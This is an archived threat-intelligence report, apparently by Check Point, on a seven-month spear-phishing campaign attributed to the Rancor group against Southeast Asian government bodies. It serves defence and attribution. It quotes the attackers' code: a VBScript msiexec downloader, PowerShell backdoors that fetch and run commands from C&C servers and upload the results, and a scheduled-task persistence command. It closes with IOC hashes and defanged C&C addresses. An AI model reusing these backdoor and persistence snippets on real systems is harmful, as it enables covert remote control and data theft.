{
	"id": "e3686d48-4bc5-4ea1-898d-0d49e2693086",
	"created_at": "2026-04-20T02:21:29.307796Z",
	"updated_at": "2026-04-20T02:22:27.781666Z",
	"deleted_at": null,
	"sha1_hash": "72fd9c6eb05ac339aace5c8771b6da7ef8de688b",
	"title": "Rancor: The Year of The Phish",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 120834,
	"plain_text": "Rancor: The Year of The Phish\r\nBy Yaroslav Harakhavik\r\nPublished: 2019-09-22 · Archived: 2026-04-20 02:19:04 UTC\r\nEarlier this year, Check Point researchers identified a targeted and extensive attack against Southeast Asian\r\ngovernment entities over the span of 7 months. The attackers, which we believe are members of the Rancor threat\r\ngroup, used classic spear-phishing to reach their victims, but have invested many of their efforts into making the\r\ne-mails and lure documents appear as convincing as possible, and by changing their TTPs over time.\r\nRancor is a threat group active since at least 2017, and was previously observed carrying attacks Singapore and\r\nCambodia, which are believed to be espionage motivated.\r\nIn this report, we will provide a deep dive analysis of the initial attack methods, infrastructure, and artifacts used\r\nagainst the targets in the latest campaign we discovered and attributed to this group. In addition, we will share\r\nsome insights that might indicate the Rancor APT group is of a Chinese origin.\r\nMain Findings\r\nThe observed attacks started with e-mails sent on behalf of employees from different government departments,\r\nembassies, or government-related entities in a Southeast Asian country. The attackers appeared determined to\r\nreach certain targets, as tens of e-mails were sent to employees under the same ministries. Furthermore, the e-mails’ origin was likely spoofed to make them seem more reliable.\r\nFig 1: Main findings\r\nInfection Flow\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 1 of 16\n\nThis extensive persistent campaign, which was ongoing for more than 7 months, continued to evolve over time,\r\nmutating its TTPs, which at times even appeared unrelated until extended analysis. Though hundreds of files were\r\ninvolved in these attacks, the following flow-chart summarizes the better part of the possible attack combination\r\nobserved throughout the campaign:\r\nFig 2: Infection flow\r\nDecoy Documents\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 2 of 16\n\nThe delivery documents relied on macros and known vulnerabilities to run malicious code on the infected system.\r\nWhat was most interesting about them, however, was the decoy content they used. Most of the documents\r\ncontained legitimate government-related topics, such as instructions for governmental employees, official letters,\r\npress releases, surveys, and more.\r\nExample:  \r\nFig 3: Legitimate looking decoy document\r\nClusters of TTPs\r\nAnalyzing the timeline of the campaign uncovered 8 major variants of TTPs (delivery, persistence and payload) in\r\ndifferent combinations. Each mini-campaign was not limited to a single target, and the attackers went after\r\nmultiple government entities simultaneously, using the same TTPs. Below is a summary of each such cluster, and\r\nthe time range in which it was observed:\r\n1st Cluster: December 2018\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 3 of 16\n\nFig 4: 1st cluster infection chain\r\nThe earliest documents observed on December 2018 and attributed to this campaign contained a short macro that\r\nexecuted the value found under the Company field in the document’s properties:\r\nFig 5: Commands hidden in the document Metadata\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 4 of 16\n\nThe command in the Company field saves a VBScript file to the temp directory, and schedules a task to run it\r\nevery two minutes. The VBS file simply downloads a second-stage MSI payload from the attacker’s server and\r\nexecutes it using msiexec:\r\nSet a=CreateObject(\"Wscript.Shell\"):a.Run \"msiexec /q /i http://p=/45.125.65[.]76/abc\",0\r\nThe MSI payload ( c96c01df9d7eeb60258dcf8ce2ccbb2e78bb5f87 ) was created using the Advanced Installer tool,\r\nwhich allows wrapping a PowerShell script into an MSI installer. This script receives instructions from the C\u0026C\r\nserver, and uploads the execution result along with the user machine information:\r\ntry{\r\n $client = New-Object System.Net.WebClient;\r\n $parameters = New-Object Collections.Specialized.NameValueCollection\r\n $commandurl = 'http://45.125.65[.]76/postval/sea.txt'\r\n $command = (New-Object System.Net.WebClient).DownloadString($commandurl)\r\n $cmdDecode = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($command))\r\n $rtn = Invoke-Expression $cmdDecode | Out-String\r\n $rtnBase = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($rtn))\r\n $parameters[\"comname\"] = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($env:USE\r\n $parameters[\"id\"]= $rtnBase\r\n $client.UploadValues(\"http://45.125.65[.]76/postval/postval.php\",$parameters)\r\n}catch\r\n{}\r\nBy the time we discovered this sample, the C\u0026C was unreachable and we were unable to download the final stage\r\npayload, but looking at other files that were hosted on the same C2, led us to a related DLL\r\n( 70bdce0f974dd0faac5684e6ca0b3476b8a12564 ). This DLL acts like a loader and tries to download an additional\r\nDLL file from www.chinhphumofa.esmtp[.]biz  and execute the RunningThread function (later referred to as\r\nRunningThread Loader).\r\n2nd Cluster: January, March 2019\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 5 of 16\n\nFig 6: 2nd cluster infection chain\r\nDuring January and March, the attackers introduced new macro code and the intermediate MSI stage was\r\nremoved. The Document_Open function in the macro contains base64-encoded blob which is decoded and saved\r\nas a .js file. This time the command to create a scheduled task is executed from the Comments property of the\r\ndocument, and it tries to add the same task with two different permissions, thus making sure that the inserted task\r\nwould utilize the higher permissions if available:\r\ncmd /c schtasks /create /sc MINUTE /tn \"Chrome\" /tr \"C:\\Windows\\Tasks\\Chrome.js\" /mo 2 /F \u0026\r\nschtasks /create /sc MINUTE /tn \"Chrome\" /tr \"C:\\Windows\\Tasks\\Chrome.js\" /mo 2 /RU SYSTEM\r\nThe Chrome.js file contains a PowerShell backdoor similar to the one in the previous version. In both scheduled\r\ntasks, the name, filename and URL patterns of the C\u0026C communication are trying to mimic Google Chrome\r\nupdates:\r\n$r=[System.Net.WebRequest]::Create('http://154.16.37[.]122/GoogleUpdate/Update.php');\r\n$resp=$r.GetResponse();\r\n$respstream=$resp.GetResponseStream();\r\n$sr=new-object System.IO.StreamReader $respstream;\r\n$Cmd=$sr.ReadToEnd();\r\n$Cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Cmd));\r\n$cmdOut=Invoke-Expression -Command:$Cmd|Out-String;\r\n$ReCmd=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($cmdOut));\r\n$uuid=Invoke-Expression -Command:'wmic csproduct get uuid'|Out-String;\r\n$Reuid=[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($uuid));\r\n$Pusl= 'http://154.16.37[.]122/GoogleUpdate/Google.php?Mac=';\r\n$Pusl=$Pusl+$Reuid;\r\n$Pusl=$Pusl+'?Data=';\r\n$Pusl=$Pusl+$ReCmd;\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 6 of 16\n\n[System.Net.WebRequest]$webRequest=[System.Net.WebRequest]::Create($Pusl);\r\n$webRequest.Method='POST';\r\n$webRequest.GetResponse();\r\nSimilar URL patterns were seen throughout the campaign.\r\n3rd Cluster: April 2019\r\nFig 7: 3rd cluster infection chain\r\nIn the next wave, the attackers added documents that exploit known vulnerabilities in MS Equation Editor to\r\ntheir arsenal. The documents are created using the known 8.t RTF weaponizer. As soon as the malicious RTF\r\ndocument is opened, the exploit triggers the execution of the 8.t payload, creating two additional files:\r\nC:\\Windows\\tracing\\OneDriveApp.vbs and C:\\Windows\\tracing\\OneDriveApp.ps1 . As in previous stages, the\r\nPowerShell payload has the same functionality to communicate with the C\u0026C, and depending on the sample\r\nmimics different Google or Microsoft applications.\r\n4th Cluster: May 2019\r\nFig 8: 4th cluster infection chain\r\nThe attack is carried by RTF documents with the same MS Equation Editor exploit builder that was used before.\r\nUpon execution, it drops two files into the temp folder: wsc_proxy.exe and wsc.dll . wsc_proxy.exe is a\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 7 of 16\n\nlegitimate Avast Antivirus executable. Using DLL side-loading, the malicious payload wsc.dll is started.\r\nThe wsc.dll itself is a loader for another DLL executing the RunningThread exported function (the same\r\nfunction name from cluster 1). This infection chain was previously described by @sebdraven.\r\nDLL side-loading is widely used to evade security programs that monitor the behaviors of executed files: some of\r\nthem are white-listed, signed or trusted files, which thereby might lead to the exclusion of malware loaded by\r\nthese files from behavioral monitoring. \r\nClusters 5-8: May-June 2019\r\nFig 9: 5th-8th cluster infection chains\r\nDuring the months of May and June, Rancor continued to introduce new infection chains that are visualized\r\nabove. In one case, the attackers turned to Cobalt Strike Beacon as their second stage payload. In another case,\r\nwhere the Bitdefender legitimate executable was used, it was downloaded from a GitHub account possibly\r\ncreated by the attackers specifically for this campaign:\r\nhttps://raw.githubusercontent[.]com/watchdogmanoo/watcherdog/master/WatchDog.exe .\r\nWhen DLL side-loading was used, the malicious DLL was in charge of downloading and executing two additional\r\nplugins internally named as “nbf.plugin” and “nbs.plugin” .\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 8 of 16\n\nFig 10: GitHub repository used to serve a legitimate Bitdefender executable\r\nConnecting the Clusters\r\nBesides going after the same government targets, we observed a lot of similarities between the different clusters\r\nwe detailed above. Overlapping indicators:\r\nMetadata – For most of the documents the Author , Operator or Last Modifier properties are one of\r\nthe following:\r\nA\r\nhttp\r\nWindows User\r\nAntiSec\r\nDDNS service – All the domains utilized ChangeIP.com for domain resolution.\r\n“8.t” RTF exploit builder – RTF files were created using the same builder.\r\nVBA Macros – Execution of code stored as a document property.\r\nDLL hijacking – Usage of known AntiVirus executables.\r\nPowershell code – Receives command to execute and uploads basic user info.\r\nDouble Schtask – For persistence, a scheduled task command was issued twice.\r\n“RunningThread” loader – Loader utilized in multiple clusters, mentioned above.\r\nEmail spoofing – The emails appeared to be sent from other government officials.\r\nBelow is a visualization of the connections we found between the different clusters:  \r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 9 of 16\n\nFig 11: Maltego graph – connecting the clusters\r\nAttribution by Infrastructure\r\nZooming in on the infrastructure connection, we see that the first and fourth versions of the attack (clusters 1 and\r\n4 in the diagram below), can be connected via multiple passive DNS hops, or by a Rancor Loader to the C\u0026C\r\ndomain www.chinhphumofa.esmtp[.]biz , which in turn can be connected via passive DNS resolution to the\r\noriginally reported Rancor C\u0026C domain: www.microsoft.https443[.]org    \r\nFig 12: Maltego graph – infrastructure connecting to previous campaign\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 10 of 16\n\nAttribution by Artifacts\r\nSearching for MSI files which encapsulate PowerShell code (as was described in Cluster 1), led us to a sample\r\nthat communicated with the IP address 199.247.6[.]253 which is a known C\u0026C used by Rancor group:\r\nFig 13: PowerShell code connecting to Rancor\r\nAnother similarity to the previous campaign is the creation of scheduled tasks by running the command\r\nschtasks twice to gain execution with SYSTEM privileges if possible. In both cases the scheduled task was set\r\nto execute every 2 minutes:\r\nFig 14: Similarity in schedule task creation technique\r\nFinally, as in the previous campaign, our campaign utilized similar macro code technique in the delivery\r\ndocuments, in order to execute the shell command stored in the Company  metadata of the document:\r\nFig 15: Similar macro code\r\nChinese Artifacts\r\nAs Rancor was not strongly attributed to any origin as of yet, we would like to offer some insights which might\r\ngive us indication that we are looking into a Chinese threat group.\r\nThe 8.t RTF exploit building kit, mentioned above, was reported by Anomali researchers as widely\r\navailable and mostly adopted by Chinese actors.\r\nThe C\u0026C servers were available only between 01:00 – 08:00 UTC time, which we believe are the working\r\nhours in the attackers’ country, therefore the range of possible origins of this attack is limited to East Asia.\r\nChinese roots can also be confirmed by the presence of metadata in Chinese for some of the documents:\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 11 of 16\n\nFig 16: Chinese metadata \r\nThe campaign wasn’t active during February 2019 which is a month of the Chinese New Year and the\r\nSpring Festival, a long holiday in China. Of course, this does not indicate a strong attribution on its own.\r\nFig 17: Activity graph\r\nAnomalies\r\nDuring our analysis, we noticed an interesting sample which might indicate some connection in activity between\r\nthis Rancor campaign and the previous activity by the Goblin Panda group (AKA 1937CN by some vendors). The\r\nsample b49c148db0b4eec53815dd1a2630c63d25cda78e (found on VirusTotal) is an RTF document created by the\r\naforementioned 8.t exploit builder, but utilized a loader which is attributed to the Goblin Panda group. The\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 12 of 16\n\ninteresting part is that the metadata of the RTF file in question exhibits the same unique Last Modified By\r\ninformation as we’ve seen in our Rancor campaign — “AntiSec” .\r\nFig 18: Anomalous metadata\r\nConclusion\r\nRancor group, which was previously spotted attacking Cambodia and Singapore, continued its targeted attacks\r\nagainst entities within the Southeast Asia region, this time concentrating 7 months of efforts on the Southeast\r\nAsian government sector. Dozens of emails sent from government officials and containing politically-themed\r\ndecoy documents were supposed to trick victims into opening them and loading malicious components providing\r\nfull access to victims’ machines. During our research we uncovered multiple leads fortifying the assumption that\r\nthe Rancor group activity is indeed of a Chinese origin. We expect the group to continue to evolve, constantly\r\nchanging their TTPs in the same manner as we observed throughout the campaign, as well as pushing their efforts\r\nto bypass security products and avoid attribution.\r\nCheck Point’s SandBlast\r\nThe malware used in this attack was caught using Check Point’s Threat Emulation and Threat Extraction.\r\nThreat Emulation is an innovative zero-day threat sandboxing capability, used by SandBlast Network to deliver\r\nthe best possible catch rate for threats, and is virtually immune to attackers’ evasion techniques. As part of the\r\nCheck Point SandBlast Zero-Day Protection solution, Threat Emulation prevents infections from new malware\r\nand targeted attacks. The Threat Extraction capability removes exploitable content, including active content and\r\nembedded objects, reconstructs files to eliminate potential threats, and promptly delivers sanitized content to users\r\nto maintain business flow.\r\nAppendix A: IOCs\r\nFirst Cluster:\r\n6958aed4327b96ca39a159f05843a7282a2e72ba\r\nc829f5f9ff89210c888c1559bb085ec6e65232de\r\n8d522e4b63a53434753ce2c58de117878b084dba\r\nb9e8b12f6eca8e32e9aa130f8e951fa24d9bcbec\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 13 of 16\n\nc96c01df9d7eeb60258dcf8ce2ccbb2e78bb5f87\r\n0d0d9e9530564099b8a95b69f99c67106d3a72ad\r\n70bdce0f974dd0faac5684e6ca0b3476b8a12564\r\nSecond Cluster:\r\n000fb43948d7e6ea7d1041881379561885188949\r\n8c7dc8b65cd20bf957f60e75bf82f159d5cc981d\r\n4326fdf22247c7eab0221a98211ee79c8af9ee7a\r\n6ad2ef8308129b707095b31ca96283722ac71d6a\r\ne188cd6d0bfcbb3275a262bc37eaa9f075a0b3d7\r\nf7125efb572709fd7d4eceb8a7c5de5c890f49aa\r\nd86f7399f3351a03c4e5a3cdd304da3e90d05fed\r\nac2a35a0d37c19a5c56271ed44988f91c80d8ef3\r\n5eae3c70b02eeb2a91983c13edddaeb48193f3a4\r\n74beb05224a77e64a14f68a65f04360cf18b7713\r\n9217f8765a9bc7ce0a9fb152676ae3560b125a86\r\n00465447fa8c3983f338c65e39107135ca933056\r\n2cd13060a764947d65e528a36fa11035845be093\r\nbe335975f80be895d097782aa4b81cc23fbc7316\r\n80514dba1f2bb7c1e71710a566081edf70c2d852\r\n16212af7b47ba999586e88a7979040f72e8184a3\r\nb13615a101657cbe05a770b98a21382643c4173a\r\n0c5534b7bb87559cf9521be9fe1e0e61ddd9819a\r\n1e320275c04ed96d6716ddf4c7209f7bfe870164\r\nf35ca93c8880099ebec532493b2cea2f19d24fb7\r\nab3e0a764699403d3032f7dbe2bea599eb64504b\r\n0ee328ee207b54f166fb637b781869e90a946119\r\n160843ec8adf065a8bd0d48558e545a64f2937a6\r\n74619159e998322a5805cf79c355fd0b4d65c0b1\r\n1e65dae984602b8036106e090a7effb19010348a\r\n29f9fd59333c2893e3be6f9fe842534494a19e45\r\n290842a691e5b265aaf456851ae6d26c592247d1\r\n8ec0d00e755b4b7fb8a5432f3ac8de84742254b6\r\nbdedd1150d44518e250f4443b540ae38a41bb845\r\n38bd426f6871d6f56ff80173494b7dfd46bb2d61\r\n262cd6693d63a23f0434c954a1c932e6a6ca97a8\r\n21921b227f74e897b86de66cbd794bd8f7bc25f2\r\nf4a84c140346f97bdf9eb2febf7af2b56a584a10\r\n0a03cefc05f979128a1a81359053e649510e696d\r\n8e3353d79dbd694ca937e5cf62f097b4c7bc7993\r\n13f6e0498d916764b2bd4c6887b283295bfd8522\r\n6517f1828a5079975cfd8c7fd4716e0019c88104\r\nd32c866ad2f5d3f0da9b1dc2d1e34a6a182784d1\r\n665484db82d3a292597c3c2c0f052dab0470f8d3\r\n35867c8615249b6bac3048be007683228224647a\r\n191e6e067fce20d175600dffcde317e5db832795\r\n3b55440f396b9c688c1724181e1780098c95bddc\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 14 of 16\n\ne4d8c33317c11d46f7f951e229b5375d4b2bd8b1\r\n4436c49e0e2c4b2214a8da5026069dae4c69f93e\r\nd6e1fc8f371a7382b6995eba5f4cf6111bd95a32\r\na0fde9cdf027f5542a0215f9a18bed7f1a448736\r\n01bbd9d36e440a1cab340cecf8735cc0e15e1ba4\r\n0159cb4c53403af8658d79ff6ec753496ba4f4ed\r\n2693d094a168d43de96303936542e84271ad8387\r\n29f478065cb20805466dd08d600aebcd512ddcef\r\n4b773753fddef2306cd9a6b94e5fef58c6adefef\r\n5635bc996903b066f97ef91a5211bb5081d93f43\r\n74046ebec592600efeab4e10bc84d0c16f5eace6\r\na7d9d9da7a743f47d82df9772ff317edb1f31160\r\nc2ccbbffbb64e2e1f973a02ccbcc974014e885da\r\n4b5ceddc05aa9256c81e4311214a8da1516f6f7f\r\na32aac2623bcb6dfa7e8ac3cf63bca68bc93ed7a\r\n98ddd45f953a932f5dcc0f9009b3c4b21fc5d63e\r\nThird Cluster:\r\ne478f27da2ca890a2c65e3b32c0488e2084424f9\r\nf95ae679aacfb9d64a3c6ec0b3642623fb5d1c28\r\na453eb9fe08427cddb01149d20609810c7e52e43\r\n2dd09441795e4f4e7a4e3fc0dfaa33995fac525a\r\naf018c7b14bcff05876cf76a1280680290db6367\r\nff11d9f8d781b6b3a786ab80f1ce59e7dfd65276\r\nd3ae9caa678754631aed1c82c409b5d43a0a9c80\r\nFourth Cluster:\r\nc39a9f4ca8075a22e82f3fbc265f9a5dda447b9f\r\nc3738fecfb9cf5bd5ddff8c63c3dcf8056a05804\r\nd7b420832bb7c61d075097ee011ed2765096e7a5\r\nb32251aa7d08718774c8fc30af698de8cfebf142\r\nb05d367d0ae1022d53926c052c9bfd8cb62745cc\r\n6e670a837970a1fb4161d77d5f720d318d7e4dbc\r\n0cc975ad5715d156a206d5b3f333b904714e03cb\r\n7b2823157014e9f2eb346ab77c036a303d295922\r\n47cab36ffcf01caaf0dbbcae272e665da2e30bc6\r\n4855cf922ec6674ca6cd87e3989c24f6ce1b2e8b\r\nbfc19afe6e5b6e6623e6ebb9d4998cc04c079513\r\nde0a7e5da69c1ed781c34445d08f892afe53547f\r\n181d466454d66a86cc2cf628b5861b7595f6bc37\r\nFifth Cluster:\r\n734c00ec4489e1c5836bd3e28d8e815baae097f8\r\n63b7617e36c70acf3dfcaecf08ca01a77c94a793\r\nf1261dbb1c4226a78a254d0ddc51217a596ef264\r\nSixth Cluster:\r\nbbf62941a569553ff079a3d8c2dcdeea2f965dbb\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 15 of 16\n\nd71149c66796094bb7d0b39eb88cb9f64c4ed92f\r\na521ae445190e366c5c9656d75e32e1aa27f2681\r\nSeventh Cluster:\r\nf65bcebb76061b79cbac90005a6d409c08182f16\r\n86969ecb7c110f4b8db6185c63e24f852ef6aed2\r\nEighth Cluster:\r\nd15bb371c9607b351321e159ea4b90b853570427\r\n7ec2e15f8f92f2602f2d573cc3abddbba3b22676\r\nHijacked DLLs:\r\ndcaae20d1593699fbe7be1853468a0ea1a49847f\r\n47cab36ffcf01caaf0dbbcae272e665da2e30bc6\r\n4855cf922ec6674ca6cd87e3989c24f6ce1b2e8b\r\nbfc19afe6e5b6e6623e6ebb9d4998cc04c079513\r\n6f5c61d7e5af72410465872f6e7356a5b928bfa6\r\nac8e51800be46a42b5ad83b207b8ea9b3e8eac70\r\n108bcb364b937a5c0b867784e21f19656ecce88d\r\nde0a7e5da69c1ed781c34445d08f892afe53547f\r\n181d466454d66a86cc2cf628b5861b7595f6bc37\r\nCobaltStrike Loader:\r\ne92d36a2d3f1cb4ac8ce9321869ab2e85d9525da\r\nC\u0026C Cervers:\r\ncharleseedwards.dynamic-dns[.]net\r\nwww.sfstnksfcv.jungleheart[.]com\r\noui6473rf.xxuz[.]com\r\nvvcxvsdvx.dynamic-dns[.]net\r\nkibistation.onmypc[.]net\r\nwww.754d56-8523.sexidude[.]com\r\nnicetiss54.lflink[.]com\r\ndsdfdscxcv.justdied[.]com\r\nwww.dsgsdgergrfv.toythieves[.]com\r\n185.234.73[.]4\r\n154.16.37[.]122\r\n152.89.161[.]19\r\n45.125.65[.]76\r\nSource: https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nhttps://research.checkpoint.com/2019/rancor-the-year-of-the-phish/\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/"
	],
	"report_names": [
		"rancor-the-year-of-the-phish"
	],
	"threat_actors": [],
	"ts_created_at": 1776651689,
	"ts_updated_at": 1776651747,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/72fd9c6eb05ac339aace5c8771b6da7ef8de688b.pdf",
		"text": "https://archive.orkl.eu/72fd9c6eb05ac339aace5c8771b6da7ef8de688b.txt",
		"img": "https://archive.orkl.eu/72fd9c6eb05ac339aace5c8771b6da7ef8de688b.jpg"
	}
}